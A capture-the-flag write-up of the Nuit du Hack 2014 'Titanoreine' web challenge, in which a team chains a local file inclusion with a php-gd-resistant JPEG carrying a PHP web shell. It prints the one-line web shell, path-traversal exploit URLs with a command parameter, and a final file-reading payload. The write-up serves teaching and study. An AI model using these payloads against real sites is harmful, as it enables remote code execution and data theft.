Title: Nuit du Hack 2014 Quals - Titanoreine (web 300)
Date: 2014/04/06 16:30

Titanoreine was a funny challenge. We were provided a website where we could
upload some pictures. There was also an obvious [LFI](
https://en.wikipedia.org/wiki/Include_vulnerability#Local_File_Inclusion ). One
may think that you just have to put some php like `<?php system($_GET['c']);?>`
into the metadata field to get code execution. The twist here was that the
image was processed by [php-gd](
https://en.wikipedia.org/wiki/Include_vulnerability#Local_File_Inclusion ),
trashing our precious metadata.

Notfound, from the [hexpresso]( http://hexpresso.wordpress.com/ ) team reminded
me that on eof the organizer was [virtualabs]( http://virtualabs.fr ). I
vaguely remembered that he wrote an article about transformations-resistant
pictures to get a php shell. He even provides a
[script]({static}/files/bulletjpg.py) to generate the images. What a
coincidence.

First we tried to use the [system](
https://www.php.net/manual/en/function.system.php) command in our payload, but
it seemed that it was not authorised. We switched to [eval](
https://www.php.net/manual/en/function.eval.php). By the way, thank you php for
providing so [many functions](
https://stackoverflow.com/questions/6470760/dangerous-php-functions ) to get
code execution.

Here is the image that we used, ![webshelljpg]({static}/images/webshelljpg.jpg) 

The payload is roughly equivalent to `<?php system($_GET['c']);?>`.


Feel free to transform it with php-gd with a quality of 98 (The one used by the chall. By the way, thanks to the teams that used the exploit-98.jpg filename for the hint ;) ) to see our payload with your [favorite]( http://rada.re ) hex editor.


We lost quite some time trying to get this kind of url working:

    http://gallery.nuitduhack.com/index.php?lang=../../../includes/ble.jpg?c=echo 1;

Here is the correct form:

    http://gallery.nuitduhack.com/index.php?c=echo 1;lang=../../../includes/ble.jpg

or

    http://gallery.nuitduhack.com/index.php?lang=../../../includes/ble.jpg&c=echo 1;

This was the "Omg plz kill me" moment of the ctf.

Anyway, we used [glob]( http://php.net/manual/en/function.glob.php ) and [file_get_contents]( http://php.net/manual/en/function.file-get-contents.php ) to get the flag.

![glob]({static}/images/ndh_titanoreine_blog.jpeg)

Here is our final payload: `http://gallery.nuitduhack.com/index.php?c=echo%20file_get_contents%28%27./includes/X~unsuspicious~X%27%29;&lang=../../../includes/ble.jpg`

![flag]({static}/images/ndh_titanoreine_flag.jpeg)

flag: `WhyAreHemorrhoidsNotCalledAssteroids`